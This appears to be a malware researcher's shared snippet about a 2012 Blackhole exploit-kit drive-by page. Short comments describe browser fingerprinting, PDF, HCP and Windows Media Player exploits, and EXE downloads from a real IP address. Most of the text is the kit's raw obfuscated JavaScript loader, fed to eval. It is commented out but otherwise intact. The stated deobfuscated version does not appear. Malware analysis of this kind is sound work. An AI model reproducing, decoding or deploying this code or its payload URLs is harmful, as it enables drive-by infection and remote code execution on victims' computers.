Browser malware found in the wild, 02/28/2012, deobf version
/* Hello from upgradeyour.com (coming soon),
I've done some security work in the past and figured this would be a fun and quick puzzle. I found the same hash as Scott on http://50.116.17.63/stats/counter.php?id=547b373f97233059, and googling it led to his post :)
It tries to identify the browser/OS version, and possibly run a WMP exploit.
It also tries to visit http://50.116.17.63/stats/w.php?f=b6863&e=4 and http://50.116.17.63/stats/w.php?f=b6863&e=1 and download and execute two different EXEs.
It tries a PDF exploit (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188, and also http://50.116.17.63/stats/content/ap2.php?f=b6863 and http://50.116.17.63/content/ap1.php ? f = b6863), and an HCP exploit as well (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885), and some PDF exploit.
This is all part of the Blackhole exploit kit, and this botnet is seemingly huge!
Scott's post is below, and after it is the deobfuscated eval and shellcode it tries to run.
*/
/*
<!-- Fake "Better Business Bureau" email had a link going to a compromised site with obfuscated JS, which ultimately created an iFrame that loaded this on a remote domain with /main.php?page=[some_characters]. -->
<!-- Probably some drive-by exploit, don't run this on - er, well - anything - but especially not WinXP. -->
<!-- Commented out to prevent accidental execution, too. -->
/*<html><body><script>
/*
ss='s';g='g';r='r';d='d';c='c';t='t';
try{new window(123).typ;}catch(qq){aa=/d/.exec("a"+"ds").index+[];e=window.eval;cc=document;}
aaa=1+[];
try{new btoa({});}catch(qqq){
if(aaa==aa)
a="ti#yo#tu#ut#yu#to#yi#ur#r#uu#uw#ye#ur#to#cw#ce#qi#tu#to#yi#ur#to#uw#wp#qi#yw#u#wp#ei#yy#to#tt#ue#to#cqp#uu#tt#ye#ur#cqp#up#tt#yq#to#cqp#ye#ue#cqp#yy#yo#tt#ti#ye#yi#yq#r#r#r#qi#t#yw#u#wp#qi#t#tu#to#yi#ur#to#uw#wp#qi#yw#uw#wp#ce#cq#qu#yp#ut#yi#tu#ur#ye#yo#yi#cqp#to#yi#ti#te#uw#to#ti#ye#uw#to#tu#ur#cw#cq#iq#ie#uy#tt#uw#cqp#up#ti#yp#uy#to#uw#qo#ro#y#w#y#w#y#w#y#tq#w#yp#yy#tt#ue#yw#uy#to#uw#qo#ro#y#w#y#w#y#w#y#tq#qu#ur#uw#uo#iq#uy#tt#uw#cqp#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#qo#iq#uy#to#uw#ue#ye#yo#yi#qy#ci#y#r#qe#r#qw#ci#w#yi#tt#yu#to#qy#ci#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#ci#w#yw#tt#yi#ti#yy#to#uw#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tu#w#ty#w#tt#cq#iq#uw#to#ur#ut#uw#yi#cqp#yp#ut#yi#tu#ur#ye#yo#yi#cw#cq#iq#tu#cw#ty#w#tt#cq#ie#ie#w#ye#ue#wy#to#yp#ye#yi#to#ti#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#uw#to#ur#ut#uw#yi#cqp#ur#uo#up#to#yo#yp#cqp#ty#co#qo#ci#ut#yi#ti#to#yp#ye#yi#to#ti#ci#ie#w#ye#ue#we#uw#uw#tt#uo#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#uw#to#ur#ut#uw#yi#cw#t#tt#uw#uw#tt#uo#t#ye#cq#r#ur#to#ue#ur#cw#eu#ty#yr#to#tu#ur#r#up#uw#yo#ur#yo#ur#uo#up#to#r#ur#yo#rq#ur#uw#ye#yi#yq#r#tu#tt#yy#yy#cw#ty#cq#cq#ie#w#ye#ue#wi#ut#yi#tu#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#uw#to#ur#ut#uw#yi#cqp#ur#uo#up#to#yo#yp#cqp#ty#qo#qo#ci#yp#ut#yi#tu#ur#ye#yo#yi#ci#ie#w#ye#ue#rq#ur#uw#ye#yi#yq#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#uw#to#ur#ut#uw#yi#cqp#ur#uo#up#to#yo#yp#cqp#ty#qo#qo#ci#ue#ur#uw#ye#yi#yq#ci#ie#w#ye#ue#ey#ut#yu#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#uw#to#ur#ut#uw#yi#cqp#ur#uo#up#to#yo#yp#cqp#ty#qo#qo#ci#yi#ut#yu#ty#to#uw#ci#ie#w#ye#ue#rq#ur#uw#ey#ut#yu#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#uw#to#ur#ut#uw#yi#cw#ur#uo#up#to#yo#yp#cqp#ty#qo#qo#ci#ue#ur#uw#ye#yi#yq#ci#cr#cr#cw#t#tp#ti#t#cq#r#ur#to#ue#ur#cw#ty#cq#cq#ie#w#yq#to#ur#ey#ut#yu#rp#to#yq#ui#qy#t#ro#tp#ti#tq#ro#tp#ti#tp#r#tp#te#w#e#tq#p#t#w#ue#up#yy#ye#ur#ey#ut#yu#rp#to#yq#ui#qy#t#ro#tp#r#tp#te#w#e#tq#t#yq#w#yq#to#ur#ey#ut#yu#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#w#tu#cq#iq#uy#tt#uw#cqp#ti#qo#ur#yw#ye#ue#w#tt#qo#ti#r#ye#ue
#rq#ur#uw#ey#ut#yu#cw#ty#cq#wq#cw#ti#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#tu#cq#wq#yi#to#uu#cqp#rp#to#yq#wu#ui#up#cw#tu#cq#qy#ti#r#yq#to#ur#ey#ut#yu#rp#to#yq#ui#cq#r#to#ui#to#tu#cw#ty#cq#qy#yi#ut#yy#yy#qu#uw#to#ur#ut#uw#yi#cqp#tt#wq#tt#ro#y#tq#qy#yi#ut#yy#yy#ie#w#tu#yo#yu#up#tt#uw#to#ey#ut#yu#ue#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yw#w#yp#w#ti#cq#iq#uy#tt#uw#cqp#to#qo#ur#yw#ye#ue#w#tu#w#ty#w#tt#w#yq#qo#up#tt#uw#ue#to#eq#yi#ur#qu#ye#yp#cw#to#r#ye#ue#rq#ur#uw#ey#ut#yu#cw#yw#cq#cr#cr#to#r#ye#ue#rq#ur#uw#ey#ut#yu#cw#yp#cq#cq#iq#ye#yp#cw#to#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#ti#cq#cr#cr#ti#r#tu#yo#yu#up#tt#uw#to#ey#ut#yu#ue#cq#iq#uw#to#ur#ut#uw#yi#cqp#ti#r#tu#yo#yu#up#tt#uw#to#ey#ut#yu#ue#cw#yw#w#yp#cq#ie#tu#qo#yw#r#ue#up#yy#ye#ur#cw#to#r#ue#up#yy#ye#ur#ey#ut#yu#rp#to#yq#ui#cq#qu#ty#qo#yp#r#ue#up#yy#ye#ur#cw#to#r#ue#up#yy#ye#ur#ey#ut#yu#rp#to#yq#ui#cq#qu#yp#yo#uw#cw#tt#qo#y#qu#tt#qi#et#tt#ur#yw#r#yu#ye#yi#cw#tu#r#yy#to#yi#yq#ur#yw#w#ty#r#yy#to#yi#yq#ur#yw#cq#qu#tt#q#q#cq#iq#ye#yp#cw#yq#cw#tu#ro#tt#tq#w#u#y#cq#wp#yq#cw#ty#ro#tt#tq#w#u#y#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#ie#ye#yp#cw#yq#cw#tu#ro#tt#tq#w#u#y#cq#qi#yq#cw#ty#ro#tt#tq#w#u#y#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#e#u#ie#ie#ie#uw#to#ur#ut#uw#yi#cqp#y#ie#w#yp#yo#uw#yu#tt#ur#ey#ut#yu#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#w#tu#cq#iq#uy#tt#uw#cqp#ti#qo#ur#yw#ye#ue#w#tt#w#to#qu#ye#yp#cw#co#ti#r#ye#ue#rq#ur#uw#ey#ut#yu#cw#ty#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#yi#ut#yy#yy#ie#ye#yp#cw#co#ti#r#ye#ue#ey#ut#yu#cw#tu#cq#cq#iq#tu#qo#qp#ie#tu#e#e#qu#to#qo#ty#r#uw#to#up#yy#tt#tu#to#cw#t#tp#ue#t#yq#w#ci#ci#cq#r#ue#up#yy#ye#ur#cw#ti#r#ue#up#yy#ye#ur#ey#ut#yu#rp#to#yq#ui#cq#r#tu#yo#yi#tu#tt#ur#cw#ro#ci#y#ci#w#ci#y#ci#w#ci#y#ci#w#ci#y#ci#tq#cq#qu#yp#yo#uw#cw#tt#qo#y#qu#tt#qi#qp#qu#tt#q#q#cq#iq#ye#yp#cw#t#tw#cw#y#q#cq#cw#r#q#cq#cy#t#r#ur#to#ue#ur#cw#to#ro#tt#tq#cq#cq#iq#to#ro#tt#tq#qo#rp#to#yq#wu#ui#up#r#cy#i#ie#ye#yp#cw#tt#wp#tu#iw#iw#co#cw#t#tp#ti#t#cq#r#ur#to#ue#ur#cw#to#ro#tt#tq#cq#cq#iq#to#ro#tt#tq#qo#ci#y#ci#ie#ie#uw#to#ur#ut#uw#yi#cqp#to#r#ue#yy#ye#tu#to#cw
#y#w#qp#cq#r#yr#yo#ye#yi#cw#ci#w#ci#cq#ie#w#cy#cy#yw#tt#ue#et#ye#yu#to#rw#uo#up#to#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tt#cq#iq#uw#to#ur#ut#uw#yi#cqp#yp#ut#yi#tu#ur#ye#yo#yi#cw#ti#cq#iq#ye#yp#cw#co#tt#r#ye#ue#eq#wu#cr#cr#ti#cq#iq#uy#tt#uw#cqp#tu#w#ty#w#to#w#yp#qo#tt#r#ye#ue#rq#ur#uw#ye#yi#yq#cw#ti#cq#wq#ro#ti#tq#qy#ti#qu#ye#yp#cw#co#yp#iw#iw#co#yp#r#yy#to#yi#yq#ur#yw#cq#iq#uw#to#ur#ut#uw#yi#cqp#yi#ut#yy#yy#ie#yp#yo#uw#cw#to#qo#y#qu#to#qi#yp#r#yy#to#yi#yq#ur#yw#qu#to#q#q#cq#iq#ye#yp#cw#t#ro#tw#tp#ue#tq#t#r#ur#to#ue#ur#cw#yp#ro#to#tq#cq#cr#cr#cw#tu#qo#yi#tt#uy#ye#yq#tt#ur#yo#uw#r#yu#ye#yu#to#rw#uo#up#to#ue#ro#yp#ro#to#tq#tq#cq#cr#cr#cw#ty#qo#tu#r#to#yi#tt#ty#yy#to#ti#ei#yy#ut#yq#ye#yi#cq#cr#cr#cw#ty#r#yi#tt#yu#to#iw#iw#ty#r#ti#to#ue#tu#uw#ye#up#ur#ye#yo#yi#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#tu#ie#ie#ie#uw#to#ur#ut#uw#yi#cqp#yi#ut#yy#yy#ie#ie#w#yp#ye#yi#ti#ey#tt#uy#ei#yy#ut#yq#ye#yi#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yy#w#to#w#tu#cq#iq#uy#tt#uw#cqp#yr#qo#ur#yw#ye#ue#w#yw#qo#yi#to#uu#cqp#rp#to#yq#wu#ui#up#cw#yy#w#ci#ye#ci#cq#w#ti#qo#cw#co#yr#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#to#cq#iw#iw#to#cq#wq#t#tp#ti#t#qy#y#w#yt#qo#tu#wq#yi#to#uu#cqp#rp#to#yq#wu#ui#up#cw#tu#w#ci#ye#ci#cq#qy#y#w#tt#qo#yi#tt#uy#ye#yq#tt#ur#yo#uw#r#up#yy#ut#yq#ye#yi#ue#w#yq#qo#ci#ci#w#yp#w#ty#w#yu#qu#yp#yo#uw#cw#yp#qo#y#qu#yp#qi#tt#r#yy#to#yi#yq#ur#yw#qu#yp#q#q#cq#iq#yu#qo#tt#ro#yp#tq#r#ti#to#ue#tu#uw#ye#up#ur#ye#yo#yi#iw#iw#yq#qu#ty#qo#tt#ro#yp#tq#r#yi#tt#yu#to#iw#iw#yq#qu#ye#yp#cw#cw#yw#r#ur#to#ue#ur#cw#yu#cq#cr#cr#cw#co#ti#iw#iw#ti#r#ur#to#ue#ur#cw#rp#to#yq#wu#ui#up#r#yy#to#yp#ur#wt#yo#yi#ur#to#ui#ur#q#rp#to#yq#wu#ui#up#r#uw#ye#yq#yw#ur#wt#yo#yi#ur#to#ui#ur#cq#cq#cq#iw#iw#cw#yw#r#ur#to#ue#ur#cw#ty#cq#cr#cr#cw#co#ti#iw#iw#ti#r#ur#to#ue#ur#cw#rp#to#yq#wu#ui#up#r#yy#to#yp#ur#wt#yo#yi#ur#to#ui#ur#q#rp#to#yq#wu#ui#up#r#uw#ye#yq#yw#ur#wt#yo#yi#ur#to#ui#ur#cq#cq#cq#cq#iq#ye#yp#cw#co#yt#iw#iw#co#cw#yt#r#ur#to#ue#ur#cw#yu#cq#iw#iw#yt#r#ur#to#ue#ur#cw#ty#cq#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#tt#ro#yp#tq#ie#ie#ie#uw#to#ur#ut#uw#yi#
cqp#yi#ut#yy#yy#ie#w#yq#to#ur#et#ye#yu#to#wu#yi#tt#ty#yy#to#ti#ei#yy#ut#yq#ye#yi#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yt#w#yu#w#tu#cq#iq#uy#tt#uw#cqp#to#qo#ur#yw#ye#ue#w#yp#w#ty#qo#yi#to#uu#cqp#rp#to#yq#wu#ui#up#cw#yu#w#ci#ye#ci#cq#w#yw#qo#ci#ci#w#yq#qo#tu#wq#yi#to#uu#cqp#rp#to#yq#wu#ui#up#cw#tu#w#ci#ye#ci#cq#qy#y#w#tt#w#yy#w#ti#w#yr#qo#to#r#ye#ue#rq#ur#uw#ye#yi#yq#cw#yt#cq#wq#ro#yt#tq#qy#yt#qu#yp#yo#uw#cw#ti#qo#y#qu#ti#qi#yr#r#yy#to#yi#yq#ur#yw#qu#ti#q#q#cq#iq#ye#yp#cw#cw#yp#qo#to#r#yw#tt#ue#et#ye#yu#to#rw#uo#up#to#cw#yr#ro#ti#tq#cq#cq#cr#cr#cw#yp#qo#yp#r#to#yi#tt#ty#yy#to#ti#ei#yy#ut#yq#ye#yi#cq#cq#iq#yy#qo#yp#r#ti#to#ue#tu#uw#ye#up#ur#ye#yo#yi#iw#iw#yw#qu#tt#qo#yp#r#yi#tt#yu#to#iw#iw#yw#qu#ye#yp#cw#ty#r#ur#to#ue#ur#cw#yy#cq#iw#iw#ty#r#ur#to#ue#ur#cw#tt#cq#cq#iq#ye#yp#cw#co#yq#iw#iw#co#cw#yq#r#ur#to#ue#ur#cw#yy#cq#iw#iw#yq#r#ur#to#ue#ur#cw#tt#cq#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#yp#ie#ie#ie#ie#uw#to#ur#ut#uw#yi#cqp#y#ie#w#yq#to#ur#ei#yy#ut#yq#ye#yi#wi#ye#yy#to#rr#to#uw#ue#ye#yo#yi#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yp#w#ty#cq#iq#uy#tt#uw#cqp#yw#qo#ur#yw#ye#ue#w#to#w#ti#w#yq#w#tt#w#tu#qo#e#u#qu#ye#yp#cw#yw#r#eu#rq#wp#i#iw#iw#co#yp#iw#iw#co#yp#r#uy#to#uw#ue#ye#yo#yi#iw#iw#co#cw#to#qo#yw#r#yq#to#ur#ey#ut#yu#cw#yp#r#uy#to#uw#ue#ye#yo#yi#cq#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#ty#ie#ye#yp#cw#co#ty#cq#iq#uw#to#ur#ut#uw#yi#cqp#to#ie#to#qo#yw#r#yp#yo#uw#yu#tt#ur#ey#ut#yu#cw#to#cq#qu#ty#qo#yw#r#yp#yo#uw#yu#tt#ur#ey#ut#yu#cw#ty#cq#qu#ti#qo#ty#r#ue#up#yy#ye#ur#cw#yw#r#ue#up#yy#ye#ur#ey#ut#yu#rp#to#yq#ui#cq#qu#yq#qo#to#r#ue#up#yy#ye#ur#cw#yw#r#ue#up#yy#ye#ur#ey#ut#yu#rp#to#yq#ui#cq#qu#yp#yo#uw#cw#tt#qo#y#qu#tt#qi#ti#r#yy#to#yi#yq#ur#yw#qu#tt#q#q#cq#iq#ye#yp#cw#tu#wp#e#u#cr#cr#tt#wp#tu#cr#cr#ti#ro#tt#tq#co#qo#ci#y#ci#cq#iq#uw#to#ur#ut#uw#yi#cqp#ty#ie#ye#yp#cw#yq#ro#tt#tq#co#qo#ti#ro#tt#tq#cq#iq#ye#yp#cw#tu#qo#qo#e#u#cq#iq#tu#qo#tt#ie#ye#yp#cw#ti#ro#tt#tq#co#qo#ci#y#ci#cq#iq#uw#to#ur#ut#uw#yi#cqp#ty#ie#ie#ie#uw#to#ur#ut#uw#yi#cqp#to#ie#w#we#ry#eu#qy#uu#ye#yi#ti#yo#uu#r#we#tu#ur#ye#uy#to#ry#eu#ty#yr
#to#tu#ur#w#yq#to#ur#we#ry#eu#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tt#cq#iq#uy#tt#uw#cqp#yp#qo#yi#ut#yy#yy#w#ti#w#ty#qo#ur#yw#ye#ue#w#tu#qo#iq#ie#qu#ur#uw#uo#iq#yp#qo#yi#to#uu#cqp#ty#r#we#ry#eu#cw#tt#cq#ie#tu#tt#ur#tu#yw#cw#ti#cq#iq#ie#uw#to#ur#ut#uw#yi#cqp#yp#ie#w#tu#yo#yi#uy#to#uw#ur#wi#ut#yi#tu#ue#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yq#cq#iq#uy#tt#uw#cqp#tt#w#yw#w#yp#w#ty#qo#t#tw#ro#tp#cy#tq#ro#tp#cy#tq#t#w#ti#qo#iq#ie#w#tu#qo#ur#yw#ye#ue#qu#yp#yo#uw#cw#tt#cqp#ye#yi#cqp#yq#cq#iq#ye#yp#cw#ty#r#ur#to#ue#ur#cw#tt#cq#cq#iq#ti#ro#tt#tq#qo#u#ie#ie#yp#yo#uw#cw#tt#cqp#ye#yi#cqp#ti#cq#iq#ur#uw#uo#iq#yw#qo#tt#r#ue#yy#ye#tu#to#cw#i#cq#qu#ye#yp#cw#yw#r#yy#to#yi#yq#ur#yw#wp#y#cr#cr#co#yq#ro#yw#tq#cq#iq#yq#ro#yw#tq#qo#yq#ro#tt#tq#cw#yq#cq#qu#ti#to#yy#to#ur#to#cqp#yq#ro#tt#tq#ie#ie#tu#tt#ur#tu#yw#cw#yp#cq#iq#ie#ie#ie#w#ye#yi#ye#ur#rq#tu#uw#ye#up#ur#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#cq#iq#uy#tt#uw#cqp#tu#qo#ur#yw#ye#ue#w#tt#qo#yi#tt#uy#ye#yq#tt#ur#yo#uw#w#to#qo#ci#t#ci#w#ye#qo#tt#r#ut#ue#to#uw#we#yq#to#yi#ur#iw#iw#ci#ci#w#yq#qo#tt#r#uy#to#yi#ti#yo#uw#iw#iw#ci#ci#w#ty#qo#tt#r#up#yy#tt#ur#yp#yo#uw#yu#iw#iw#ci#ci#w#yw#qo#tt#r#up#uw#yo#ti#ut#tu#ur#iw#iw#ci#ci#qu#ye#yp#cw#tu#r#yp#ye#yy#to#cq#iq#tu#r#yp#ye#yy#to#r#cy#qo#tu#ie#ye#yp#cw#tu#r#uy#to#uw#ye#yp#uo#cq#iq#tu#r#uy#to#uw#ye#yp#uo#r#cy#qo#tu#ie#qu#tu#r#eu#rq#qo#u#y#y#qu#ye#yp#cw#ty#cq#iq#uy#tt#uw#cqp#yp#w#ti#qo#ro#ci#rt#ye#yi#ci#w#u#w#ci#et#tt#tu#ci#w#i#w#ci#er#ye#yi#ut#ui#ci#w#o#w#ci#wi#uw#to#to#wr#rq#wy#ci#w#qp#w#ci#ye#ei#yw#yo#yi#to#ci#w#i#u#r#u#w#ci#ye#ei#yo#ti#ci#w#i#u#r#i#w#ci#ye#ei#tt#ti#ci#w#i#u#r#o#w#ci#rt#ye#yi#r#p#wt#wu#ci#w#i#i#r#u#w#ci#rt#ye#yi#r#p#et#yo#ty#ye#yy#to#ci#w#i#i#r#i#w#ci#ei#yo#tu#yt#to#ur#tp#tp#ue#p#ei#wt#ci#w#i#i#r#o#w#ci#ci#w#u#y#y#tq#qu#yp#yo#uw#cw#yp#qo#ti#r#yy#to#yi#yq#ur#yw#e#i#qu#yp#wp#qo#y#qu#yp#qo#yp#e#i#cq#iq#ye#yp#cw#ti#ro#yp#tq#cr#cr#yi#to#uu#cqp#rp#to#yq#wu#ui#up#cw#ti#ro#yp#tq#w#ci#ye#ci#cq#r#ur#to#ue#ur#cw#ty#cq#cq#iq#tu#r#eu#rq#qo#ti#ro#yp#q#u#tq#qu#ty#uw#to#tt#yt#ie#ie#ie#tu#r#tu#yo#yi#uy#to#uw#ur#wi#ut#
yi#tu#ue#cw#tu#cq#qu#tu#r#ye#ue#eq#wu#qo#yi#to#uu#cqp#wi#ut#yi#tu#ur#ye#yo#yi#cw#ci#uw#to#ur#ut#uw#yi#cqp#ci#q#to#q#ci#p#ww#tu#tu#te#yo#yi#co#ww#p#ci#q#to#q#ci#yp#tt#yy#ue#to#ci#cq#cw#cq#qu#tu#r#uy#to#uw#eq#wu#qo#tu#r#ye#ue#eq#wu#cr#cr#cw#t#et#rq#eq#wu#tp#ue#p#cw#tp#ti#q#tp#r#wq#tp#ti#p#cq#t#ye#cq#r#ur#to#ue#ur#cw#ye#cq#wq#up#tt#uw#ue#to#wi#yy#yo#tt#ur#cw#rp#to#yq#wu#ui#up#r#cy#u#w#u#y#cq#qy#yi#ut#yy#yy#qu#tu#r#we#tu#ur#ye#uy#to#ry#wu#yi#tt#ty#yy#to#ti#qo#yp#tt#yy#ue#to#qu#ye#yp#cw#tu#r#ye#ue#eq#wu#cq#iq#uy#tt#uw#cqp#yp#w#yr#qo#ro#ci#et#ue#ui#yu#yy#i#r#ry#et#er#ep#rw#rw#ei#ci#w#ci#et#ue#ui#yu#yy#i#r#wy#eu#et#wy#yo#tu#ut#yu#to#yi#ur#ci#w#ci#et#ye#tu#uw#yo#ue#yo#yp#ur#r#ry#et#er#wy#eu#et#ci#w#ci#rq#yw#yo#tu#yt#uu#tt#uy#to#wi#yy#tt#ue#yw#r#rq#yw#yo#tu#yt#uu#tt#uy#to#wi#yy#tt#ue#yw#ci#w#ci#rw#wy#wt#wt#ur#yy#r#rw#wy#wt#wt#ur#yy#ci#w#ci#rq#yw#to#yy#yy#r#re#eq#ep#to#yy#up#to#uw#ci#w#ci#rq#tu#uw#ye#up#ur#ye#yi#yq#r#wy#ye#tu#ur#ye#yo#yi#tt#uw#uo#ci#w#ci#uu#yu#up#yy#tt#uo#to#uw#r#yo#tu#ui#ci#tq#qu#yp#yo#uw#cw#yp#qo#y#qu#yp#qi#yr#r#yy#to#yi#yq#ur#yw#qu#yp#q#q#cq#iq#ye#yp#cw#tu#r#yq#to#ur#we#ry#eu#cw#yr#ro#yp#tq#cq#cq#iq#tu#r#we#tu#ur#ye#uy#to#ry#wu#yi#tt#ty#yy#to#ti#qo#ur#uw#ut#to#qu#ty#uw#to#tt#yt#ie#ie#tu#r#yw#to#tt#ti#qo#tu#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#ti#yo#tu#ut#yu#to#yi#ur#r#yq#to#ur#wu#yy#to#yu#to#yi#ur#ue#wr#uo#rw#tt#yq#ey#tt#yu#to#cq#wq#ti#yo#tu#ut#yu#to#yi#ur#r#yq#to#ur#wu#yy#to#yu#to#yi#ur#ue#wr#uo#rw#tt#yq#ey#tt#yu#to#cw#ci#yw#to#tt#ti#ci#cq#ro#y#tq#qy#yi#ut#yy#yy#ie#tu#r#ye#ue#wo#to#tu#yt#yo#qo#cw#t#wo#to#tu#yt#yo#t#ye#cq#r#ur#to#ue#ur#cw#yw#cq#cr#cr#cw#t#wo#to#tu#yt#yo#tp#ue#p#tp#t#tp#ue#p#tp#ti#t#ye#cq#r#ur#to#ue#ur#cw#ye#cq#qu#tu#r#uy#to#uw#wo#to#tu#yt#yo#qo#tu#r#ye#ue#wo#to#tu#yt#yo#wq#tu#r#yp#yo#uw#yu#tt#ur#ey#ut#yu#cw#cw#t#uw#uy#tp#ue#p#tp#qy#tp#ue#p#cw#ro#tp#r#tp#w#tp#ti#tq#q#cq#t#ye#cq#r#ur#to#ue#ur#cw#ye#cq#wq#rp#to#yq#wu#ui#up#r#cy#u#qy#ci#y#r#qt#ci#cq#qy#yi#ut#yy#yy#qu#tu#r#ye#ue#rq#tt#yp#tt#uw#ye#qo#cw#t#rq#tt#yp#tt#uw#ye#tp#ue#p#tp#t#tp#ue#p#tp#ti#
t#ye#cq#r#ur#to#ue#ur#cw#ye#cq#cr#cr#cw#t#we#up#up#yy#to#t#ye#cq#r#ur#to#ue#ur#cw#yq#cq#qu#tu#r#ye#ue#wt#yw#uw#yo#yu#to#qo#cw#t#wt#yw#uw#yo#yu#to#tp#ue#p#tp#t#tp#ue#p#cw#tp#ti#ro#tp#ti#tp#r#tq#p#cq#t#ye#cq#r#ur#to#ue#ur#cw#ye#cq#qu#tu#r#uy#to#uw#wt#yw#uw#yo#yu#to#qo#tu#r#ye#ue#wt#yw#uw#yo#yu#to#wq#tu#r#yp#yo#uw#yu#tt#ur#ey#ut#yu#cw#rp#to#yq#wu#ui#up#r#cy#u#cq#qy#yi#ut#yy#yy#qu#tu#r#ye#ue#eu#up#to#uw#tt#qo#cw#t#eu#up#to#uw#tt#tp#ue#p#ro#tp#t#tq#wq#tp#ue#p#cw#tp#ti#q#tp#r#wq#tp#ti#p#cq#t#ye#cq#r#ur#to#ue#ur#cw#ye#cq#qu#tu#r#uy#to#uw#eu#up#to#uw#tt#qo#tu#r#ye#ue#eu#up#to#uw#tt#cr#cr#cw#cw#t#rr#to#uw#ue#ye#yo#yi#tp#ue#p#tp#t#tp#ue#p#cw#tp#ti#q#tp#r#wq#tp#ti#p#cq#t#ye#cq#r#ur#to#ue#ur#cw#ye#cq#iw#iw#u#cq#wq#up#tt#uw#ue#to#wi#yy#yo#tt#ur#cw#rp#to#yq#wu#ui#up#r#cy#u#w#u#y#cq#qy#yi#ut#yy#yy#qu#tu#r#tt#ti#ti#rt#ye#yi#wu#uy#to#yi#ur#cw#ci#yy#yo#tt#ti#ci#w#tu#r#yw#tt#yi#ti#yy#to#uw#cw#tu#r#uw#ut#yi#rt#er#yp#ut#yi#tu#ue#w#tu#cq#cq#ie#w#ye#yi#ye#ur#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tu#cq#iq#uy#tt#uw#cqp#ty#qo#ur#yw#ye#ue#w#tt#w#tu#qu#ye#yp#cw#co#ty#r#ye#ue#rq#ur#uw#ye#yi#yq#cw#tu#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#e#o#ie#ye#yp#cw#tu#r#yy#to#yi#yq#ur#yw#qo#qo#u#cq#iq#ty#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#to#yy#ye#yu#ye#ur#to#uw#qo#tu#qu#uw#to#ur#ut#uw#yi#cqp#e#o#ie#tu#qo#tu#r#ur#yo#er#yo#uu#to#uw#wt#tt#ue#to#cw#cq#r#uw#to#up#yy#tt#tu#to#cw#t#tp#ue#t#yq#w#ci#ci#cq#qu#tt#qo#ty#ro#tu#tq#qu#ye#yp#cw#co#tt#iw#iw#co#tt#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#cq#iq#uw#to#ur#ut#uw#yi#cqp#e#o#ie#ty#r#up#yy#ut#yq#ye#yi#qo#tt#qu#ye#yp#cw#co#ty#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#tt#r#ye#yi#ue#ur#tt#yy#yy#to#ti#cq#cq#iq#tt#r#ye#yi#ue#ur#tt#yy#yy#to#ti#qo#tt#r#uy#to#uw#ue#ye#yo#yi#qo#tt#r#uy#to#uw#ue#ye#yo#yi#y#qo#tt#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#yo#yi#to#qo#yi#ut#yy#yy#qu#tt#r#cy#qo#ty#qu#tt#r#up#yy#ut#yq#ye#yi#ey#tt#yu#to#qo#tu#ie#ty#r#yq#tt#uw#ty#tt#yq#to#qo#yp#tt#yy#ue#to#qu#ye#yp#cw#ty#r#ye#ue#eq#wu#cr#cr#co#ty#r#we#tu#ur#ye#uy#to#ry#wu#yi#tt#ty#yy#to#ti#cq#iq#ye#yp#cw#tt#co#qo#qo#ty#r#yr#tt#uy#tt#cq#i
q#uw#to#ur#ut#uw#yi#cqp#e#i#ie#ie#uw#to#ur#ut#uw#yi#cqp#u#ie#w#yp#ei#ut#ue#yw#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#w#tt#cq#iq#uy#tt#uw#cqp#tu#qo#ur#yw#ye#ue#qu#ye#yp#cw#tu#r#ye#ue#we#uw#uw#tt#uo#cw#tt#cq#cr#cr#cw#tu#r#ye#ue#wi#ut#yi#tu#cw#ty#cq#iw#iw#cw#tu#r#ye#ue#we#uw#uw#tt#uo#cw#ty#cq#cr#cr#ty#r#yy#to#yi#yq#ur#yw#wp#y#cr#cr#tu#r#ye#ue#wi#ut#yi#tu#cw#ty#ro#y#tq#cq#cq#cq#cq#iq#tt#r#up#ut#ue#yw#cw#ty#cq#ie#ie#w#tu#tt#yy#yy#we#uw#uw#tt#uo#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#uy#tt#uw#cqp#tu#qo#ur#yw#ye#ue#w#tt#qu#ye#yp#cw#tu#r#ye#ue#we#uw#uw#tt#uo#cw#ty#cq#cq#iq#yp#yo#uw#cw#tt#qo#y#qu#tt#qi#ty#r#yy#to#yi#yq#ur#yw#qu#tt#q#q#cq#iq#ye#yp#cw#ty#ro#tt#tq#qo#qo#qo#yi#ut#yy#yy#cq#iq#uw#to#ur#ut#uw#yi#ie#tu#r#tu#tt#yy#yy#cw#